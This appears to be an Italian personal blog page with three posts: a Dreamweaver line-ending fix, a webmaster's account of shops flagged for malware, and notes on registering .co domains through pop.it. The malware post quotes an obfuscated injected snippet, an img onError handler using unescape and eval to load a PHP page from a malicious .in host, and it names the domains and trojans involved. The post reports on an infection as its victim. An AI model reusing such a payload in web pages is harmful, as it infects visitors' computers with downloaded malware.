Dreamweaver Aggiunge Righe Vuote nel Codice Html

Righe vuote nel codice Dreamweaver

Vi è mai capitato usando Macromedia Dreamweaver di trovarvi nel codice html un sacco di righe vuote?

Cosa molto fastidiosa, una volta aperto un file spaziato giusto lo visualizza con una riga vuota dopo ogni riga di codice, allungando molto la pagina e riducendo la leggibilità; ovviamente poi al momento del salvataggio, verranno salvate anche queste righe vuote in più.

Oggi mi è capitato per l’ennesima volta, quindi stufo di questa spaziatura ho deciso di dedicare qualche minuto per scoprire il problema.

La risposta a queste righe vuote nel codice sta nel come viene interpretata l’interruzione di riga; nel mio caso era impostata la codifica “windows” e lavorando su un server hosting linux lo traduceva in un doppio a capo.

Come potete vedere nell’immagine qui sopra ho impostato “tipo di interruzione di riga” su “Unix” e il problema fastidioso è scomparso. Svelato il mistero 😉

Ho deciso di scrivere questa soluzione così magari evito arrabbiature a qualcuno, o spero almeno. Tralasciando il discorso dreamweaver credo possa tornare utile anche per altri editor, soprattutto quelli che hanno l’ftp incorporato.

[RISOLTO] Sito Infetto Da Malware: Dove?

In questi giorni mi sono arrivate un paio di notifiche da parte di utenti che aprendo due miei siti (negozi online per la precisione) l’antivirus scatta sull’attenti segnalando codice malevolo. Pensando che fosse qualcos’altro non ho dato molto peso, oggi però l’ho potuto vedere grazie ad uno screenshot.

C’è qualcosa che non va.. guardando sui webmaster tools di Google vedo che su un sito mi segnala una pagina contenente questo codice:

Purtroppo Google ha trovato codice dannoso sul tuo sito.

< img src=”about:blank” onError=’astro=unescape(“%27”);astru=
unescape(“%22”);sksa=eval(“document.getElementById(“+astro+”
seaid”+astro+”).src=unescape(“+astro+”%68%74%74%70%3A%2F%2F”
+astro+”)+document.getElementById(“+astro+”5550″+astro+”).id
+unescape(“+astro+”%2E%69%6E%2F”+astro+”)+”+astro+”129091371
2″+astro+”+unescape(“+astro+”%2E%70%68%70″+astro+”)”);docume
nt.getElementById(“seaid”).src=sksa’ style=”width:300;height
:300;border:0px;” >

mentre sul secondo sito mi dice che è tutto ok.

Facendo qualche ricerca trovo che questo codice è proprio la codifica di un url solitamente composto cosi xxxxx.in/xxxx.php che contiene codice malevolo e fa aprire 2 pdf infetti. Leggo inoltre che ha colpito molti blog su base wordpress.

Per caso ne hai sentito parlare?

Io nei miei due negozi online, creati con cms diversi (zen-cart e virtuemart) non riesco a trovare questo codice, inoltre ho guardato le date di ultima modifica dei file per capire se qualcuno avesse iniettato codice malevolo e non c’è niente di recente. Ho cercato veramente a fondo leggendo tutti i casi e cercando file dopo file eventuali stringhe nascoste, iframe o script, htaccess e file config,  ma niente! E’ tutto in ordine e pulito..

A me personalmente non è mai apparso niente navigandoci e comunque Google non da l’avviso di “sito che può danneggiare il tuo computer”; non so più dove guardare o cosa fare. Credo ci sia qualcosa, perchè avendo ricevuto segnalazioni diverse ho scartato l’idea di un falso positivo o di un problema sul pc con cui si naviga.

Hai qualche consiglio da darmi? esperienze simili? aiuti su dove potrebbe esserci un buco?

I due negozi hanno una versione dei cms è piuttosto datata lo so, però sono le versioni stabili con relative patch; non le ho ancora aggiornate in quanto sono gli ultimi mesi di vita, presto lasceranno il posto ad un negozio tutto nuovo.

Per il momento non mi resta che aspettare l’aggiornamento dei dati in strumenti per webmaster di Google per vedere se lo ritrova.

Ogni consiglio sarà veramente di aiuto, grazie!

P.S.: Ho un buono adwords da 75 euro in più 😀 Potrebbe essere un regalo per chi risolve il caso 😉

P.P.S.: Visitando i siti ricevete un allarme dal vostro antivirus? (se lo avete ovviamente)

UPDATE: Ancora oggi sono in alto mare.. ho potuto testarlo di persona; dopo il tad di chiusura </html> appare il codice postato sopra, richiama un file php che carica delle classi java, fa scaricare dei file pdf e fa partire il media player di windows. Un disastro insomma.

Vedo che il sito dannoso è 3737373.in o in-in.in, trattasi di Un Trojan-Downlaoder.java.openconnection.bu e un trojan Packed.Win32.Krap.ao

UPDATE RISOLUTIVO: Bene, trovata la soluzione. Il codice maligno non riuscivo a scovarlo semplicemente perchè non c’era. -.- Mi ha risposto il provider dicendo che han risolto; un sito ospitato sul mio stesso server stava infettando tutti gli altri.

Bene, anno nuovo server nuovo, passo ad un dedicato 😉

Registrazione Domini .CO – Opinioni e Recensione Provider pop.it

È una battuta, Colombia --> Columbia Mai Visto Attila il Flagello di Dio?Ieri mi è arrivata una mail pubblicitaria da parte di Register (noto mantainer) che mi informava della possibilità dal 20 Luglio di registrare i domini .CO ovvero della Colombia.

Come estensione non è male, è corta, semplice da ricordare e assomiglia al .com.

Allora sotto con lo shopping: quando parto con la ricerca di nomi a dominio mi trasformo in una donna piena di carte di credito (non sue) in un centro commerciale!

La ricerca non è stata delle più felici, ho provato un pò di combinazioni di keywords divertenti come por.co, par.co, mar.co, cosmeti.co, simpati.co, ma tutti già presi.. pazzesco!

Abbandono il “gioco di parole” per buttarmi sulle keywords singole, nome a dominio con una sola parola, ma anche qui tutti quelli che mi interessavano erano già stati presi.. sempre più incredibile! Un vero e proprio assalto tipo utenti (matti) Apple, il primo giorno di vendita del iqualcosa nei negozi.

Con la parola secca ho trovato due domini che mi piacevano e li ho registrati, sono bigiotteria.co e benessere.co ;li linko spammando un pò così li presento a Guglez 😉 Al momento fanno un redirect verso altri miei siti, nell’attesa di trovare un pò di tempo libero per metterci qualcosa.

Tu sei riuscito a registrare qualche dominio .CO? hai avuto una bella idea? o semplicemente non te ne può fregar di meno? 😀

Termino parlando del provider pop.it. Visto che non avevo niente di serio in mente, non volevo spendere chissà cosa di hosting e registrazione per questi domini .co e quindi register, nonostante il 30% di sconto, mi sembrava un pò troppo.

Dopo una piccola ricerca sono finito proprio su pop.it che mi dava di più a meno prezzo, quindi da buon cybernauta (cosa scusa?) ho guglato (termine tecnico) in cerca di opinioni e recensioni su questo maintainer pop.it non trovando nulla! Forse un topic in un forum, ma senza risposte..

Allora eccomi qui, faccio da cavia!
Continua a leggere… »